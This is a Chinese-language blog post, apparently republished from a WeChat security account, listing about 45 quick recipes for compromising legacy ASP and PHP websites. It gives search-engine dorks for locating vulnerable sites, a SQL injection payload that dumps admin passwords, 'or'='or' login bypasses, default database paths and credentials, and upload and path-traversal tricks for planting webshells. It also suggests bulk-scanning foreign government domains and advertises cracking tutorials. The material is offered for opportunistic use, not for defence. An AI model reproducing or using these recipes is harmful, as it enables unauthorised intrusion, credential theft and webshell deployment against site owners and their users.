oday漏洞利用简单实用

本次资源从网络整合,一些漏洞利用的方式,没有配图比较枯燥,各位看自己的兴趣观看吧。

1.谷歌搜索Powered by aspcms.com Copyright ?2010-2011

利用注入漏洞:/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

爆ADMIN密码

2.到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库!

2,到Google,site:cq.cninurl:asp

3,

利用挖掘鸡和一个ASP木马.

文件名是login.asp

路径组是/manage/

关键词是went.asp

用'or'='or'来登陆

4,这个应该N多人都搞过吧。。

关键字:CoNetMIBVer1.0网站后台管理系统

帐号密码为'or'='or'

5.动感购物系统呵呵。想到了明小子

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。默认数据库地址blogdata/acblog.asa

关键字:acblog

7.

百度/htdocs

注册里可以直接上传asa文件!

8.

/Database/#newasp.mdb

关键词:NewAspSiteManageSystemVersion

9.

用挖掘机

关键字:PoweredbyWEBBOY

页面:/upfile.asp

这个。。。。。。。不用说了。--!

10.

baidu中搜索关键字Ver5.0Build0519

(存在上传漏洞)

11.

Upfile_Article.aspbbs/upfile.asp

输入关键字:poweredbymypower,

应该是动什么上传漏洞来着?用的人也比较多

工具明小子挖掘鸡就可以了

12.

inurl:winnt\system32\inetsrv\

在google里面输入这个就可以找到很多网站

13.

现在GOOGLE搜索关键字intitle:网站小助手 inurl:asp

14.

关键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛

挖掘鸡的关键字添setup.asp

15.

VBulletin论坛的数据库

默认数据库地址!

/includes/functions.php

工具:

1.网站猎手下载地址:百度Google!

2.Google

关键字:

Poweredby:vBulletinVersion3.0.1

Poweredby:vBulletinVersion3.0.2

Poweredby:vBulletinVersion3.0.3

其中一个就可以了

16.

1.打开百度或GOOGLE搜索,输入poweredbycomersusASPshoppingcart

opensource。

这是一个商场系统。

2.网站的最底部分,有个ComersusOpenTechnologiesLC。打开看下~~comersus系统~

猜到,comersus.mdb.是数据库名

数据库都是放在database/后的,

所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。

那样把前一个''store/''除去,再加上database/comersus.mdb试试

都是默认数据库地址

17.无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/

或者是http://您的域名/admin.asp

2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir或msmir

数据库文件为http://您的域名/msmirdata/msmirArticle.mdb

或者是http://您的域名/msmirdata/msmirArticle.asa

数据库连接文件为***********/Conn.asp

也是默认数据库地址。现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`

18.

百度里输入/skins/default/

这个没试过。。。

19.利用挖掘机

关键机:powerbyDiscuz

路径:/wish.php

配合:

Discuz!论坛wish.php远程包含漏洞

20.

上传漏洞.

工具:当然还是明小子了

网站猎手或者挖掘鸡了。

关键字poweredbymypower

检测的页面或文件插入upfile_photo.asp

这个用的人也N多。。

21.新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字"关于本站-网站帮助-广告合作-下载声明-友情连接-网站地图-管理登录"

把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了#可以用%23替换就可以下载了

\database\%23newasp.mdb

如:#xzws.mdb改成%23xzws.mdb

22.

通吃所有商城+动力上传系统

使用工具:挖掘鸡v1.1明小子

商城**:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成

漏洞页面:upload.asp

upfile_flash.asp

还是上传漏洞拿webshell

23.

注射漏洞

百度搜索ioj'sblog

24

动易

列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp

25.

工具:网站猎手

关键词:inurl:Went.asp

后缀:manage/login.asp

口令:'or'='or'

这软件还不是太熟悉。--

26.

**魔兽****

需要的工具:ASP木马--!废话了。

明小子

关键字:AllRightReservedDesign:游戏联盟

后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb

都默认的。数据库闹下来自己解密吧不多说了。

27.

漏洞是利用管理员iis设置的失误

用baidu关键字就是比较罕见的脚本名

动网:ReloadForumCache.asp

Leadbbs:makealltopanc.asp

BBSXP:admin_fso.asp

动易:admin_articlerecyclebin.asp

28.

国外站的爆库漏洞

关键字:sadRaven'sGuestbook

密码地址:/passwd.dat

后台地址:/admin.php

29.

Discuz4.1.0跨站漏洞

利用工具:1,WAP浏览器

2,WAP编码转换器

关键字:"intextiscuz!4.1.0"

WAP浏览器..............................!!

30.

关键字:尚奈克斯

后台路径/system/manage.asp

直接传ASP木马

31.

工具

1:网站猎手

2:大马

关键字:切勿关闭Cookies功能,否则您将不能登录

插入diy.asp

32.

关键字:Team5StudioAllrightsreserved

默认数据库:data/team.mdb

33.

工具:挖掘机辅臣数据库读取器

关键字:企业简介产品展示产品列表

后缀添加:/database/myszw.mdb

后台地址:admin/Login.asp

都默认的。一样。数据库闹下来自己解密码去。就行了。。--

34.

关键子XXXinurl:Nclass.asp

在"系统设置"里写个木马。

会被保存到在config.asp内。

35.

不进后台照样拿动网WEBSHELL

data.asp?action=BackupData动网数据库备份默认路径

36.

工具:网站猎手WebShell

关键字:inurl:Went.asp

后缀:manage/login.asp

弱口令:'or'='or'

37.

关键字oweredbyCDN_NEWS

随便扫遍文章加一个',来试探注入点

后台地址:admin_index.asp

用啥工具我就不说了吧。。。。。。。。。

38.

**雷池新闻发布系统

关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp

再上传马.....

进访问uppicanran.asp登陆马.

39.

工具挖掘机就行了。

关键字owerSystemOfArticleManagementVer3.0Build20030628

默认数据库:database\yiuwekdsodksldfslwifds.mdb

后台地址:自己扫描!

工具明小子。--!怎么又是他啊。

MD5自己解.........

(NND这个一扫一大堆。大家可以去试试。。)

40.

一、通过GOOGLE搜索找大量注入点

关键字:asp?id=1gov.jp/asp?id=

页数:100

语言:想**哪个国家就填什么语言吧

42

关键字:Poweredby:94KKBBS2005

利用密码找回功能找回admin

提问:ddddd回答:ddddd

42.

关键字:inurl:Went.asp

后台为manage/login.asp

后台密码:'or'='或者'or''=''or'登录 进入

默认数据库地址atabase/DataShop.mdb

43.

关键字:******inurl:readnews.asp

把最后一个/改成%5c,直接暴库,看密码,进后台

随便添加个新闻在标题输入我们的一句话木马

44.

工具:一句话木马

BBsXp5.0sp1管理员猜解器

关键词:poweredbybbsxp5.00

进后台,备份一句话马!

45.

关键字:程序核心:BJXSHOP网上开店专家

后台:/admin

本次提供的教程为破解教程,二十个G的内容,回复数字32获取

每篇文章都会提供教程或者软件,请持续关注本公众号

原文发布于微信公众号 - 白安全组(bai-1152770445)

原文发表时间:2018-09-17

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券